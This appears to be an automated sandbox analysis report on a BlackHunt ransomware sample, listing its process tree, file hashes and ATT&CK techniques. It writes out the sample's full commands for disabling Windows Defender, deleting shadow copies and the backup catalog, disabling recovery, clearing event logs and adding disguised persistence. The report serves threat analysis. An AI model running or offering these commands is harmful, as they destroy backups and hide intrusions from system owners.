a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe 141 PID 3800 wrote to memory of 4124 3800 a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe 143 PID 3800 wrote to memory of 4124 3800 a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe 143 PID 544 wrote to memory of 4048 544 cmd.exe 177 PID 544 wrote to memory of 4048 544 cmd.exe 177 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe"C:\Users\Admin\AppData\Local\Temp\a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:3800 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1340 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:872
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1424 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵PID:2736
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4088 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:1200
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4852 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:716
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4664 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:4276
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4888 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2884
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3076 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:4020
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2260
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:3236
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4976 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:3008
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2236
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:2076
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3100 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:3316
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:544 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:4048
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:2812
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:1920
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:1036
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:4100
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:1484
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:4928
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:1700
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:676
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:4660
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:3532
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:3456
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2724
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:4464
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:2384
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:4124
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:3236
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:4300
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:1436
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:1672
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:1220
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:4160
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:3696
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵
- Modifies registry class
PID:2736 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:5440
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:4500
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:7520
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:3432
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:6352
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:3628
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:5616
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:1680
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:5620
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe" /F2⤵PID:1916
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of WriteProcessMemory
PID:2260
-
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe" /F3⤵
- Creates scheduled task(s)
PID:5704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:3548
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:7316
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:4020
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:6324
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:2256
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:7780
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:4048
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:4284
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:1920
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:7360
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:1972
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of WriteProcessMemory
PID:2236
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:6656
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:3480
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:6252
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2212
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:7804
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:632
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:5856
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:756
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:7504
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:5112
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:8636
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:16288
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵PID:9044
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:16300
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:8980
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:12108
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵PID:852
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:6872
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
PID:18604
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:1936
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
PID:8244
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:7740
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
PID:18528
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:8260
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
PID:18720
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:8212
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:18660
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:8956
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
PID:18640
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:18468
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:18756
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:18480
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:19108
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:18596
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:19344
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:19224
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:19444
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:18864
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:11388
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:18820
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:9000
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:19284
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:14276
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 14276 -s 14644⤵
- Program crash
PID:2736
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\a0930582b0bca3046dcee36a67e39b430044ea7ec4b5c84fa6047eafc282753b.exe"2⤵PID:19392
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:18924
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:18828
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
PID:11360
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:18884
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:19412
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:19212
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:8604
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:19328
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:8848
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:19184
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:18892
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:18744
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:19032
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:6776
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:7420
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:9656
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:1444
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 14276 -ip 142761⤵PID:8568
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5423928d3fb610534c4be288440629e2f
SHA185a7eed39f7189d52df5a5ce62df01ab97f715fc
SHA2560896658100e2bc56bc2e436b07cfff1a8a8c08f7032e61a46b83727ad5aef099
SHA5128b567df51891ca0abd2186e761ff96a61babfc52dcbeb5112b95bf5124333026962451adfab124a0d04787f82d8af744367d8dc6bcd43973fd190e6ae954f165
-
Filesize
12KB
MD592a594c23a2161cac413d0db0fd372ef
SHA118088d8510f1561bb494be220082c20532ce07c3
SHA25682a9c871b23fd65bf155e02eb08f3a6dad6364e76656eb0b4d7b157b79f1e7da
SHA512a54cf03b37be022977333c0e75e7fe6e2a8647d4ca5516046262d8608743450e2458466be691b1d656dcbf88edd511129a9a74cbec0b12a40a28647ede5d733e
-
Filesize
684B
MD53189f31e45b5dc8ee0cb1417c44c2540
SHA1fd4333a1ecc5c4af34bef3e07a6c5c203285ac94
SHA25664bb981769c606e07568380699ad3a2c3c6ac2a49db2e4b9cc0d45878bcdc45b
SHA5121b2cf41014191f9cd4467ea18c4e679b99a9c7eaafb4eba208bfa5242a6efba6e493ed0afd4fff81def85b82f6a78b006144e09baf7c5a5663b692e1530e5b3e